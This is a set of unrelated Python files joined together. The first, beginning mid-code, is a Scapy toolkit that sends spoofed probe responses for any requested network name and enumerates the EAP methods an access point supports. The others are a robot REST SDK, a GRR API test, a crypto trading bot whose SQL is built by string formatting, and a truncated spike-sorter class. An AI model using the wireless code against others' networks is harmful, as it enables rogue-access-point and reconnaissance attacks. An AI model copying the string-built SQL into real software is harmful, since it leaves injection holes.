info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01")/ Dot11Elt(ID=42, info="\x00")/ Dot11Elt(ID=50, info="\x30\x48\x60\x6c")/ Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00") ) def run(self): """ This is the thread routine that handles probe requests and sends probe responses when appropriate. """ while not self.__shutdown__: sniff(iface=self.interface, store=0, timeout=RESPONSE_TIMEOUT, stop_filter=self.__stopfilter__) if self.lastpacket: if self.lastpacket.haslayer(Dot11ProbeReq): ssid = None tmp = self.lastpacket.getlayer(Dot11ProbeReq) while tmp: tmp = tmp.payload if tmp.fields['ID'] == 0: ssid = tmp.info break if ssid is None: continue elif ssid == '' and self.essid: ssid = self.essid if self.essid is None or self.essid == ssid: self.probe_response_template.getlayer(Dot11).addr1 = get_source(self.lastpacket) self.probe_response_template.getlayer(Dot11Elt).info = ssid sendp(self.probe_response_template, iface=self.interface, verbose=False) self.lastpacket = None continue clientMAC = get_source(self.lastpacket) if not self.client_queue.full(): self.client_queue.put(clientMAC, False) self.lastpacket = None continue class WirelessStateMachine: """ This provides a psuedo-socket like object that provides a stack for Dot11 communications using Scapy. Remember: States Are For Smashing """ def __init__(self, interface, bssid, source_mac=None, dest_mac=None): """ You must specify a BSSID and a Local MAC address because the entire point of this code is to facilitate stateful connections. """ if not source_mac: source_mac = getHwAddr(interface) if not dest_mac: dest_mac = bssid self.interface = interface self.bssid = bssid.lower() self.source_mac = source_mac.lower() self.dest_mac = dest_mac.lower() self.connected = False # connected / associated self.__shutdown__ = False self.sequence = randint(1200, 2000) self.lastpacket = None self.timeout = RESPONSE_TIMEOUT def __del__(self): self.shutdown() self.close() def __fixSC__(self, fragment=0): """ This is a reserved method to return the sequence number in a way that is not skewed by a bug in how the SC field is packed in Scapy. """ SC = (self.sequence - ((self.sequence >> 4) << 4) << 12) + (fragment << 8) + (self.sequence >> 4) return unpack('<H', pack('>H', SC))[0] def __stopfilter__(self, packet): """ This is the stop filter for Scapy to be used to check if the packet was sent to this WirelessStateMachine instance. """ if get_destination(packet) == self.source_mac and get_bssid(packet) == self.bssid: # and real_source == self.dest_mac: self.lastpacket = packet return True self.lastpacket = None return False def __thread_sniff__(self): """ Sniff function threaded to start before packets are sent """ sniff(iface=self.interface, stop_filter=self.__stopfilter__, timeout=RESPONSE_TIMEOUT) def __thread_sendp__(self, payload): """ Sendp function used for opening thread, sending packets, and closing thread """ quick_sniff = threading.Thread(target=self.__thread_sniff__) quick_sniff.start() time.sleep(0.1) sendp(payload, iface=self.interface, verbose=False) quick_sniff.join() def connect(self, essid, rsnInfo=''): """ Connect/Associate with an access point. errDict = { -1:"Already Connected", 0:"No Error", 1:"Failed To Get Probe Response", 2:"Failed To Get Authentication Response", 3:"Failed To Get Association Response", 4:"Authentication Request Received Fail Response", 5:"Association Request Received Fail Response" } """ # Dot11 Probe Request (to get authentication information if applicable) payload = ( RadioTap()/ Dot11(addr1=self.dest_mac, addr2=self.source_mac, addr3=self.dest_mac)/ Dot11Auth(seqnum=1) ) self.__thread_sendp__(payload) if rsnInfo is None: # None explicitly means go get it, leave it '' to proceed with out it rsnInfo = self.get_rsn_information(essid) if self.lastpacket is None or not self.lastpacket.haslayer(Dot11Auth): return 2 if self.lastpacket.getlayer(Dot11Auth).status != 0: return 4 #Dot11 Association Request payload = ( RadioTap()/ Dot11(addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), subtype=0)/ Dot11AssoReq(cap='ESS+short-preamble+short-slot', listen_interval=10)/ Dot11Elt(ID=0, info=essid)/ Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c')/ Dot11Elt(ID=50, info='\x0c\x12\x18\x60')/ rsnInfo ) self.__thread_sendp__(payload) if self.lastpacket is None or not self.lastpacket.haslayer(Dot11AssoResp): return 3 if self.lastpacket.getlayer(Dot11AssoResp).status != 0: return 5 self.connected = True self.sequence = 0 return 0 def close(self): """ Disassociate from the access point, This does not veify that the AP received the message and should be considred a best-effort attempt. errDict = { -1:"Not Connected", 0:"No Error" } """ if not self.connected: return -1 sendp( RadioTap()/ Dot11(addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=0, subtype=12)/ Dot11Disas(reason=3), iface=self.interface, verbose=False ) sendp( RadioTap()/ Dot11(addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=0, subtype=12)/ Dot11Disas(reason=3), iface=self.interface, verbose=False ) self.connected = False return 0 def get_rsn_information(self, essid): rsnInfo = None sendp( RadioTap()/ Dot11(addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), subtype=4)/ Dot11ProbeReq()/ Dot11Elt(ID=0, info=essid)/ Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c')/ Dot11Elt(ID=50, info='\x0c\x12\x18\x60'), iface=self.interface, verbose=False ) self.sequence += 1 sniff(iface=self.interface, store=0, timeout=self.timeout, stop_filter=self.__stopfilter__) if self.lastpacket is None or not self.lastpacket.haslayer(Dot11ProbeResp): return None probeResp = self.lastpacket.getlayer(Dot11ProbeResp) tmp = probeResp.getlayer(Dot11Elt) while tmp: if tmp.fields.get('ID') == 48: rsnInfo = tmp break else: tmp = tmp.payload if rsnInfo is None: rsnInfo = '' # Did not find rsnInfo in probe response. else: rsnInfo = build_rsn_data(parse_rsn_data(rsnInfo.info)) rsnInfo = '\x30' + chr(len(rsnInfo)) + rsnInfo return rsnInfo def recv(self, bufferlen=0): """ Read a frame and return the information above the Dot11 layer. """ sniff(iface=self.interface, store=0, timeout=self.timeout, stop_filter=self.__stopfilter__) if self.lastpacket: return self.lastpacket else: return None def send(self, data, dot11_type=2, dot11_subtype=8, FCfield=0x02, raw=True): """ Send a frame, if raw, insert the data above the Dot11QoS layer. """ frame = RadioTap()/Dot11(FCfield=FCfield, addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=dot11_type, subtype=dot11_subtype) if raw: frame = frame/data else: frame = frame/Dot11QoS()/data sendp(frame, iface=self.interface, verbose=False) self.sequence += 1 def shutdown(self): """ Shutdown and disassociate from the AP. """ if self.connected: self.close() self.__shutdown__ = True class WirelessStateMachineEAP(WirelessStateMachine): """ This is to keep the EAP functionality seperate so the core State- Machine can be repurposed for other projects. """ def check_eap_type(self, essid, eaptype, outer_identity='user', eapol_start=False, rsnInfo=''): """ Check that an eaptype is supported. errDict = { 0:"supported", 1:"not supported", 2:"could not determine", 3:"identity rejected" } """ eapid = randint(1, 254) if eapol_start: eapol_start_request = ( RadioTap()/ Dot11(FCfield=0x01, addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=2, subtype=8)/ Dot11QoS()/ LLC(dsap=170, ssap=170, ctrl=3)/ SNAP(code=0x888e)/ EAPOL(version=1, type=1) ) self.sequence += 1 i = 0 for i in range(0, EAP_MAX_TRIES): self.__thread_sendp__(eapol_start_request) if not self.lastpacket is None: if self.lastpacket.haslayer('EAP'): fields = self.lastpacket.getlayer('EAP').fields if 'type' in fields and fields['type'] == 1 and fields['code'] == 1: i = 0 eapid = fields['id'] break if i == 2: return 2 eap_identity_response = ( RadioTap()/ Dot11(FCfield=0x01, addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=2, subtype=8)/ Dot11QoS()/ LLC(dsap=170, ssap=170, ctrl=3)/ SNAP(code=0x888e)/ EAPOL(version=1, type=0)/ EAP(code=2, type=1, id=eapid, identity=outer_identity) ) eap_legacy_nak = ( RadioTap()/ Dot11(FCfield=0x01, addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=2, subtype=8)/ Dot11QoS()/ LLC(dsap=170, ssap=170, ctrl=3)/ SNAP(code=0x888e)/ EAPOL(version=1, type=0, len=6)/ EAP(code=2, type=3, id=eapid + 1, eap_types=[eaptype]) ) self.sequence += 1 for i in range(0, EAP_MAX_TRIES): self.__thread_sendp__(eap_identity_response) if not self.lastpacket is None: if self.lastpacket.haslayer('EAP'): fields = self.lastpacket.getlayer('EAP').fields if fields['code'] == 4: # 4 is a failure return 3 if 'type' in fields and fields['type'] == eaptype: return 0 i = 0 break if i == 2: return 2 for i in range(0, EAP_MAX_TRIES): self.__thread_sendp__(eap_legacy_nak) if not self.lastpacket is None: if self.lastpacket.haslayer('EAP'): fields = self.lastpacket.getlayer('EAP').fields if 'type' in fields and fields['type'] == eaptype: return 0 else: return 1 return 2
robotRestSDK.py
import logging import threading import os from pyramid.config import Configurator from pyramid.response import Response from pyramid.events import NewRequest from wsgiref.simple_server import make_server import simplepybotsdk.configurations as configurations from simplepybotsdk.robotWebSocketSDK import RobotWebSocketSDK as RobotWebSocketSDK from simplepybotsdk.robotSocketSDK import RobotSocketSDK as RobotSocketSDK logger = logging.getLogger(__name__) SOCKET_AS_WEB_SOCKET = os.getenv('SOCKET_AS_WEB_SOCKET', True) class RobotRESTSDK(RobotWebSocketSDK if SOCKET_AS_WEB_SOCKET is True else RobotSocketSDK): """RobotSDK + RobotWebSocketSDK + REST robot's component control with Pyramid.""" def __init__(self, config_path: str, socket_host: str, socket_port: int, rest_host: str, rest_port: int, robot_speed: float = 1.0, motors_check_per_second: int = None, motors_point_to_point_check_per_second: int = None, socket_send_per_second: int = None): """ :param config_path: SimplePYBotSDK json configuration file path. :param socket_host: socket host to listen. :param socket_port: socket port to listen. :param rest_host: web server host to listen. :param rest_port: web server port to listen. :param robot_speed: robot speed. Use this to make robot move slower or faster. Default is 1. :param motors_check_per_second: numbers of motor's check per second. Set to 0 to disable dedicated thread. :param motors_point_to_point_check_per_second: numbers of motor's movement in a second during point to point. :param socket_send_per_second: numbers of dump send to the socket client in 1 second. """ super().__init__(config_path, socket_host, socket_port, robot_speed, motors_check_per_second, motors_point_to_point_check_per_second, socket_send_per_second) logger.debug("RobotRESTSDK initialization") self.rest_base_url = "/api/v1/robot" self.rest_enable_cors = True self.rest_custom_url = "custom" # Custom POST path self._rest_host = rest_host self._rest_port = rest_port self._thread_rest = None self._server = None self._dashboard_link = "https://vellons.github.io/SimplePYBotDashboard" def rest_configure(self): """ Method to configure web services routes and views. """ with Configurator() as config: config.add_route("hello_world", self.rest_base_url + "/") config.add_view(self._rest_hello_world, route_name="hello_world") config.add_route("rest_configuration", self.rest_base_url + "/configuration/", request_method="GET") config.add_view(self._rest_robot_configuration, route_name="rest_configuration") config.add_route("rest_status", self.rest_base_url + "/status/", request_method="GET") config.add_view(self._rest_robot_status, route_name="rest_status") config.add_route("rest_status_abs", self.rest_base_url + "/status/absolute/", request_method="GET") config.add_view(self._rest_robot_status_absolute, route_name="rest_status_abs") config.add_route("rest_sdk_info", self.rest_base_url + "/sdk/", request_method="GET") config.add_view(self._rest_robot_sdk_info, route_name="rest_sdk_info") config.add_route("rest_sdk_patch", self.rest_base_url + "/sdk/", request_method=["PATCH", "OPTIONS"]) config.add_view(self._rest_robot_sdk_patch, route_name="rest_sdk_patch") config.add_route("rest_motors", self.rest_base_url + "/motors/", request_method="GET") config.add_view(self._rest_robot_motors, route_name="rest_motors") config.add_route("rest_motor_by_key", self.rest_base_url + "/motors/{key}/", request_method="GET") config.add_view(self._rest_robot_motor_detail_by_key, route_name="rest_motor_by_key") config.add_route("rest_motor_patch_by_key", self.rest_base_url + "/motors/{key}/", request_method=["PATCH", "OPTIONS"]) config.add_view(self._rest_robot_motor_patch_by_key, route_name="rest_motor_patch_by_key") config.add_route("rest_go_to_pose", self.rest_base_url + "/go-to-pose/{key}/", request_method=["POST", "OPTIONS"]) config.add_view(self._rest_robot_go_to_pose, route_name="rest_go_to_pose") config.add_route("rest_move_point_to_point", self.rest_base_url + "/move-point-to-point/", request_method=["POST", "OPTIONS"]) config.add_view(self._rest_robot_move_point_to_point, route_name="rest_move_point_to_point") config.add_route("rest_sensors", self.rest_base_url + "/sensors/", request_method="GET") config.add_view(self._rest_robot_sensors, route_name="rest_sensors") config.add_route("rest_sensors_by_key", self.rest_base_url + "/sensors/{key}/", request_method="GET") config.add_view(self._rest_robot_sensors_detail_by_key, route_name="rest_sensors_by_key") config.add_route("rest_custom_post", self.rest_base_url + "/" + self.rest_custom_url + "/", request_method=["POST", "OPTIONS"]) config.add_view(self._rest_robot_custom_post, route_name="rest_custom_post") if self.rest_enable_cors: config.add_subscriber(add_cors_headers_response_callback, NewRequest) app = config.make_wsgi_app() self._server = make_server(self._rest_host, self._rest_port, app) def rest_serve_forever(self): """ Method to start web services thread. """ self._thread_rest = threading.Thread(name="rest_thread", target=self._rest_thread_handler, args=()) self._thread_rest.daemon = True self._thread_rest.start() def _rest_thread_handler(self): logger.debug("[rest_thread]: start serving on {}".format((self._rest_host, self._rest_port))) ip_addr = self._rest_host if self._rest_host == "0.0.0.0" and self.show_log_message: ip_addr = get_my_ip() print("[rest_thread]: start serving at:\n\t- Local: http://localhost:{}{}/\n\t- Network: http://{}:{}{}/" .format(self._rest_port, self.rest_base_url, ip_addr, self._rest_port, self.rest_base_url)) elif self.show_log_message: print("[rest_thread]: start serving at: http://{}:{}{}/" .format(ip_addr, self._rest_port, self.rest_base_url)) if self.show_log_message: link = self._dashboard_link + "/?webserverurl=http://" + ip_addr + ":" + str(self._rest_port) + \ self.rest_base_url if hasattr(self, '_web_socket_port'): link += "&websocketurl=ws://" + ip_addr + ":" + str(self._web_socket_port) link += "&autoconnect=1" link += " Remember to 'Unblock mixed content' in browser" print("[rest_thread]: dashboard link: {}".format(link)) self._server.serve_forever() def _rest_hello_world(self, root, request): detail = "Hello World! These are web services for robot name: '{}'".format(self.configuration["name"]) return Response(json_body={"detail": detail}) def _rest_robot_configuration(self, root, request): return Response(json_body=self.configuration) def _rest_robot_status(self, root, request): return Response(json_body=self.get_robot_dict_status()) def _rest_robot_status_absolute(self, root, request): return Response(json_body=self.get_robot_dict_status(absolute=True)) def _rest_robot_sdk_info(self, root, request): return Response(json_body=self.get_sdk_infos()) def _rest_robot_sdk_patch(self, root, request): if request.method == "OPTIONS": return Response(json_body={}) try: speed = round(request.json_body["robot_speed"], 2) self.robot_speed = 0.05 if speed < 0.05 else speed logger.debug("set robot_speed to {}".format(self.robot_speed)) return Response(json_body=self.get_sdk_infos()) except Exception as e: logger.error("[rest_thread]: robot_sdk_patch: {}".format(e)) return Response(json_body={"detail": "Bad request. Use robot_speed field"}, status=400) def _rest_robot_motors(self, root, request): motors = [] for m in self.motors: motors.append(dict(m)) return Response(json_body=motors) def _rest_robot_motor_detail_by_key(self, root, request): m = self.get_motor(request.matchdict["key"]) if m is None: return Response(json_body={"detail": "Not found."}, status=404) return Response(json_body=dict(m)) def _rest_robot_motor_patch_by_key(self, root, request): if request.method == "OPTIONS": return Response(json_body={}) m = self.get_motor(request.matchdict["key"]) if m is None: return Response(json_body={"detail": "Not found."}, status=404) try: m.set_goal_angle(int(request.json_body["goal_angle"])) return Response(json_body=dict(m)) except Exception as e: logger.error("[rest_thread]: robot_motor_patch_by_key: {}".format(e)) return Response(json_body={"detail": "Bad request. Use goal_angle key"}, status=400) def _rest_robot_go_to_pose(self, root, request): if request.method == "OPTIONS": return Response(json_body={}) key = request.matchdict["key"] seconds = 0 if request.body and "seconds" in request.json_body: seconds = request.json_body["seconds"] if type(seconds) is not int and type(seconds) is not float: seconds = 0 seconds = 0 if seconds < 0.5 else seconds result = self.go_to_pose(key, seconds, seconds == 0) if result: return Response(json_body={"detail": "Going to pose {} in {} seconds".format(key, seconds)}) return Response( json_body={"detail": "Something went wrong. See all available pose with /configuration/"}, status=400) def _rest_robot_move_point_to_point(self, root, request): if request.method == "OPTIONS": return Response(json_body={}) try: seconds = 0 pose = dict(request.json_body) if "seconds" in request.json_body: seconds = request.json_body["seconds"] del pose['seconds'] if type(seconds) is not int and type(seconds) is not float: seconds = 0 seconds = 0 if seconds < 0.5 else seconds self.move_point_to_point(pose, seconds, seconds == 0) return Response(json_body={"detail": "Move point to point in {} seconds".format(seconds)}) except Exception as e: logger.error("[rest_thread]: robot_move_point_to_point: {}".format(e)) return Response(json_body={"detail": "Bad request. Use: {\"motor_key\": goal_angle}"}, status=400) def _rest_robot_sensors(self, root, request): sensors = [] for s in self.sensors: sensors.append(dict(s)) return Response(json_body=sensors) def _rest_robot_sensors_detail_by_key(self, root, request): s = self.get_sensor(request.matchdict["key"]) if s is None: return Response(json_body={"detail": "Not found."}, status=404) return Response(json_body=dict(s)) def _rest_robot_custom_post(self, root, request): if request.method == "OPTIONS": return Response(json_body={}) response = self.rest_custom_post(request.json_body) return Response(json_body=response) def rest_custom_post(self, body): print("rest_custom_post(): {}".format(body)) return {"detail": "Override rest_custom_post() method"} def add_cors_headers_response_callback(event): def cors_headers(request, response): response.headers.update({ "Access-Control-Allow-Origin": "*", "Access-Control-Allow-Methods": "GET,POST,PATCH,OPTIONS", "Access-Control-Allow-Headers": "Origin, Content-Type, Accept", "Access-Control-Max-Age": "600", "SimplePYBotSDK": configurations.VERSION }) event.request.add_response_callback(cors_headers) def get_my_ip(): try: import socket s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("1.1.1.1", 80)) my_ip = s.getsockname()[0] s.close() return my_ip except: return "localhost"
flow_test.py
#!/usr/bin/env python # -*- encoding: utf-8 -*- """Tests for API client and flows-related API calls.""" from __future__ import absolute_import from __future__ import division from __future__ import unicode_literals import threading import time from absl import app from future.builtins import range from grr_api_client import errors as grr_api_errors from grr_api_client import utils as grr_api_utils from grr_response_core.lib import rdfvalue from grr_response_core.lib import utils from grr_response_core.lib.rdfvalues import client as rdf_client from grr_response_core.lib.util import compatibility from grr_response_server import aff4 from grr_response_server import data_store from grr_response_server import flow_base from grr_response_server.flows.general import processes from grr_response_server.gui import api_e2e_test_lib from grr.test_lib import action_mocks from grr.test_lib import db_test_lib from grr.test_lib import flow_test_lib from grr.test_lib import test_lib @db_test_lib.DualDBTest class ApiClientLibFlowTest(api_e2e_test_lib.ApiE2ETest): """Tests flows-related part of GRR Python API client library.""" def testSearchWithNoClients(self): clients = list(self.api.SearchClients(query=".")) self.assertEqual(clients, []) def testSearchClientsWith2Clients(self): client_urns = sorted(self.SetupClients(2)) clients = sorted( self.api.SearchClients(query="."), key=lambda c: c.client_id) self.assertLen(clients, 2) for i in range(2): self.assertEqual(clients[i].client_id, client_urns[i].Basename()) self.assertEqual(clients[i].data.urn, client_urns[i]) def testListFlowsFromClientRef(self): client_urn = self.SetupClient(0) flow_id = flow_test_lib.StartFlow( processes.ListProcesses, client_id=client_urn) flows = list(self.api.Client(client_id=client_urn.Basename()).ListFlows()) self.assertLen(flows, 1) self.assertEqual(flows[0].client_id, client_urn.Basename()) self.assertEqual(flows[0].flow_id, flow_id) self.assertEqual(flows[0].data.flow_id, flow_id) def testListFlowsFromClientObject(self): client_urn = self.SetupClient(0) flow_id = flow_test_lib.StartFlow( processes.ListProcesses, client_id=client_urn) client = self.api.Client(client_id=client_urn.Basename()).Get() flows = list(client.ListFlows()) self.assertLen(flows, 1) self.assertEqual(flows[0].client_id, client_urn.Basename()) self.assertEqual(flows[0].flow_id, flow_id) self.assertEqual(flows[0].data.flow_id, flow_id) def testCreateFlowWithUnicodeArguments(self): unicode_str = "🐊 🐢 🦎 🐍" client_urn = self.SetupClient(0) args = processes.ListProcessesArgs( filename_regex=unicode_str, fetch_binaries=True) client_ref = self.api.Client(client_id=client_urn.Basename()) result_flow = client_ref.CreateFlow( name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto()) got_flow = client_ref.Flow(flow_id=result_flow.flow_id).Get() self.assertEqual(got_flow.args.filename_regex, unicode_str) def testCreateFlowFromClientRef(self): client_urn = self.SetupClient(0) args = processes.ListProcessesArgs( filename_regex="blah", fetch_binaries=True) if data_store.RelationalDBEnabled(): flows = data_store.REL_DB.ReadAllFlowObjects(client_urn.Basename()) self.assertEmpty(flows) else: children = aff4.FACTORY.Open(client_urn, token=self.token).ListChildren() self.assertEmpty(list(children)) client_ref = self.api.Client(client_id=client_urn.Basename()) result_flow = client_ref.CreateFlow( name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto()) if data_store.RelationalDBEnabled(): flows = data_store.REL_DB.ReadAllFlowObjects(client_urn.Basename()) self.assertLen(flows, 1) self.assertEqual(flows[0].args, args) else: children = aff4.FACTORY.Open(client_urn, token=self.token).ListChildren() self.assertLen(list(children), 1) result_flow_obj = aff4.FACTORY.Open( result_flow.data.urn, token=self.token) self.assertEqual(result_flow_obj.args, args) def testCreateFlowFromClientObject(self): client_urn = self.SetupClient(0) args = processes.ListProcessesArgs( filename_regex="blah", fetch_binaries=True) if data_store.RelationalDBEnabled(): flows = data_store.REL_DB.ReadAllFlowObjects(client_urn.Basename()) self.assertEmpty(flows) else: children = aff4.FACTORY.Open(client_urn, token=self.token).ListChildren() self.assertEmpty(list(children)) client = self.api.Client(client_id=client_urn.Basename()).Get() result_flow = client.CreateFlow( name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto()) if data_store.RelationalDBEnabled(): flows = data_store.REL_DB.ReadAllFlowObjects(client_urn.Basename()) self.assertLen(flows, 1) self.assertEqual(flows[0].args, args) else: children = aff4.FACTORY.Open(client_urn, token=self.token).ListChildren() self.assertLen(list(children), 1) result_flow_obj = aff4.FACTORY.Open( result_flow.data.urn, token=self.token) self.assertEqual(result_flow_obj.args, args) def testListResultsForListProcessesFlow(self): process = rdf_client.Process( pid=2, ppid=1, cmdline=["cmd.exe"], exe="c:\\windows\\cmd.exe", ctime=1333718907167083, RSS_size=42) client_urn = self.SetupClient(0) flow_urn = flow_test_lib.TestFlowHelper( compatibility.GetName(processes.ListProcesses), client_id=client_urn, client_mock=action_mocks.ListProcessesMock([process]), token=self.token) if isinstance(flow_urn, rdfvalue.RDFURN): flow_id = flow_urn.Basename() else: flow_id = flow_urn result_flow = self.api.Client(client_id=client_urn.Basename()).Flow(flow_id) results = list(result_flow.ListResults()) self.assertLen(results, 1) self.assertEqual(process.AsPrimitiveProto(), results[0].payload) def testWaitUntilDoneReturnsWhenFlowCompletes(self): client_urn = self.SetupClient(0) flow_id = flow_test_lib.StartFlow( processes.ListProcesses, client_id=client_urn) result_flow = self.api.Client( client_id=client_urn.Basename()).Flow(flow_id).Get() self.assertEqual(result_flow.data.state, result_flow.data.RUNNING) def ProcessFlow(): time.sleep(1) client_mock = action_mocks.ListProcessesMock([]) flow_test_lib.FinishAllFlowsOnClient(client_urn, client_mock=client_mock) t = threading.Thread(target=ProcessFlow) t.start() try: f = result_flow.WaitUntilDone() self.assertEqual(f.data.state, f.data.TERMINATED) finally: t.join() def testWaitUntilDoneRaisesWhenFlowFails(self): client_urn = self.SetupClient(0) flow_id = flow_test_lib.StartFlow( processes.ListProcesses, client_id=client_urn) result_flow = self.api.Client( client_id=client_urn.Basename()).Flow(flow_id).Get() def ProcessFlow(): time.sleep(1) if data_store.RelationalDBEnabled(): flow_base.TerminateFlow(client_urn.Basename(), flow_id, "") else: with aff4.FACTORY.Open( client_urn.Add("flows").Add(flow_id), mode="rw", token=self.token) as fd: fd.GetRunner().Error("") t = threading.Thread(target=ProcessFlow) t.start() try: with self.assertRaises(grr_api_errors.FlowFailedError): result_flow.WaitUntilDone() finally: t.join() def testWaitUntilDoneRasiesWhenItTimesOut(self): client_urn = self.SetupClient(0) flow_id = flow_test_lib.StartFlow( processes.ListProcesses, client_id=client_urn) result_flow = self.api.Client( client_id=client_urn.Basename()).Flow(flow_id).Get() with self.assertRaises(grr_api_errors.PollTimeoutError): with utils.Stubber(grr_api_utils, "DEFAULT_POLL_TIMEOUT", 1): result_flow.WaitUntilDone() def main(argv): test_lib.main(argv) if __name__ == "__main__": app.run(main)
get_realtime_data.py
import datetime as dt import hmac import json import os import signal import time from datetime import datetime as dtdt from hashlib import sha256 from secrets import token_hex from threading import Thread import websocket from lib import message, repository from lib.config import Bitflyer # ------------------------------------- key = Bitflyer.Api.value.KEY.value secret = Bitflyer.Api.value.SECRET.value end_point = 'wss://ws.lightstream.bitflyer.com/json-rpc' public_channels = ['lightning_executions_FX_BTC_JPY', 'lightning_ticker_FX_BTC_JPY'] private_channels = [] database = "tradingbot" # ------------------------------------- def quit_loop(signal, frame): os._exit(0) class bFwebsocket(object): def __init__( self, end_point, public_channels, private_channels, key, secret): self._end_point = end_point self._public_channels = public_channels self._private_channels = private_channels self._key = key self._secret = secret self._JSONRPC_ID_AUTH = 1 def startWebsocket(self): def on_open(ws): print("Websocket connected") if len(self._private_channels) > 0: auth(ws) if len(self._public_channels) > 0: params = [{'method': 'subscribe', 'params': {'channel': c}} for c in self._public_channels] ws.send(json.dumps(params)) def on_error(ws, error): print(error) def on_close(ws): print("Websocket closed") def run(ws): while True: ws.run_forever() time.sleep(3) def on_message(ws, message): messages = json.loads(message) # auth レスポンスの処理 if 'id' in messages and messages['id'] == self._JSONRPC_ID_AUTH: if 'error' in messages: print('auth error: {}'.format(messages["error"])) elif 'result' in messages and messages['result']: params = [{'method': 'subscribe', 'params': {'channel': c}} for c in self._private_channels] ws.send(json.dumps(params)) if 'method' not in messages or messages['method'] != 'channelMessage': return params = messages["params"] channel = params["channel"] recept_data = params["message"] if channel == "lightning_executions_FX_BTC_JPY": for r in recept_data: date = r["exec_date"][:26] date = date.replace("T", " ").replace("Z", "") date = \ dtdt.strptime(date, '%Y-%m-%d %H:%M:%S.%f') date = date + dt.timedelta(hours=9) side = r["side"] price = r["price"] size = str(r["size"]) sql = "insert into execution_history values (null,'{date}','{side}',{price},'{size}')"\ .format(date=date, side=side, price=price, size=size) repository.execute(database=database, sql=sql, log=False) if channel == "lightning_ticker_FX_BTC_JPY": date = recept_data["timestamp"][:26] date = date.replace("T", " ").replace("Z", "") date = \ dtdt.strptime(date, '%Y-%m-%d %H:%M:%S.%f') date = date + dt.timedelta(hours=9) best_bid = recept_data["best_bid"] best_ask = recept_data["best_ask"] sql = "update ticker set date='{date}',best_bid={best_bid},best_ask={best_ask}"\ .format(date=date, best_bid=best_bid, best_ask=best_ask) repository.execute(database=database, sql=sql, log=False) def auth(ws): now = int(time.time()) nonce = token_hex(16) sign = hmac.new(self._secret.encode( 'utf-8'), ''.join([str(now), nonce]).encode('utf-8'), sha256).hexdigest() params = { 'method': 'auth', 'params': { 'api_key': self._key, 'timestamp': now, 'nonce': nonce, 'signature': sign}, 'id': self._JSONRPC_ID_AUTH} ws.send(json.dumps(params)) ws = websocket.WebSocketApp( self._end_point, on_open=on_open, on_message=on_message, on_error=on_error, on_close=on_close) websocketThread = Thread(target=run, args=(ws, )) websocketThread.start() def initialize(): sql = "select * from ticker" ticker = repository.read_sql(database=database, sql=sql) if ticker.empty: message.info("initialize ticker") sql = "insert into ticker values (now(),0,0)" repository.execute(database=database, sql=sql, write=False) if __name__ == '__main__': initialize() signal.signal(signal.SIGINT, quit_loop) ws = bFwebsocket(end_point, public_channels, private_channels, key, secret) ws.startWebsocket()
basesorter.py
""" Here a proposal for the futur Sorter with class approach. The main idea is to decompose all intermediate steps to get more flexibility: * setup the recording (traces, output folder, and so...) * set parameters * run the sorter (with futur possibility to make it in separate env/container) * get the result (SortingExtractor) One benfit shoudl to compare the "run" time between sorter without the setup and getting result. One new idea usefull for tridesclous and maybe other sorter would a way to adapt params with datasets. """ import time import copy from pathlib import Path import threading import shutil import os import datetime import json import traceback import numpy as np import spikeextractors as se class BaseSorter: sorter_name = '' # convinience for reporting installed = False # check at class level if isntalled or not SortingExtractor_Class = None # convinience to get the extractor requires_locations = False _default_params = {} sorter_gui_params = [ {'name': 'output_folder', 'type': 'folder', 'value': None, 'default': None, 'title': "Sorting output folder path", 'base_param': True}, {'name': 'verbose', 'type': 'bool', 'value': True, 'default': True, 'title': "The verbosity of the underlying spike sorter.", 'base_param': True}, {'name': 'grouping_property', 'type': 'str', 'value': None, 'default': None, 'title': "Will sort the recording by the given property ('group', etc.)", 'base_param': True}, {'name': 'parallel', 'type': 'bool', 'value': False, 'default': False, 'title': "If the recording is sorted by a property, then it will do this in parallel", 'base_param': True}, {'name': 'delete_output_folder', 'type': 'bool', 'value': False, 'default': False, 'title': "If True, delete the results of the sorter, otherwise, it won't.", 'base_param': True}, ] installation_mesg = "" # error message when not installed def __init__(self, recording=None, output_folder=None, verbose=False, grouping_property=None, parallel=False, delete_output_folder=False): assert self.installed, """This sorter {} is not installed. Please install it with: \n{} """.format(self.sorter_name, self.installation_mesg) if self.requires_locations: if 'location' not in recording.get_shared_channel_property_names(): raise RuntimeError("Channel locations are required for this spike sorter. " "Locations can be added to the RecordingExtractor by loading a probe file " "(.prb or .csv) or by setting them manually.") self.verbose = verbose self.grouping_property = grouping_property self.parallel = parallel self.params = self.default_params() if output_folder is None: output_folder = 'tmp_' + self.sorter_name output_folder = Path(output_folder).absolute() if grouping_property is None: # only one groups self.recording_list = [recording] self.output_folders = [output_folder] if 'group' in recording.get_shared_channel_property_names(): groups = recording.get_channel_groups() if len(groups) != len(np.unique(groups)) > 1: print("WARNING! The recording contains several group. In order to spike sort by 'group' use " "grouping_property='group' as argument.") else: # several groups if grouping_property not in recording.get_shared_channel_property_names(): raise RuntimeError(f"'{grouping_property}' is not one of the channel properties.") self.recording_list = recording.get_sub_extractors_by_property(grouping_property) n_group = len(self.recording_list) self.output_folders = [output_folder / str(i) for i in range(n_group)] # make dummy location if no location because some sorter need it for recording in self.recording_list: if 'location' not in recording.get_shared_channel_property_names(): print('WARNING! No channel location given. Add 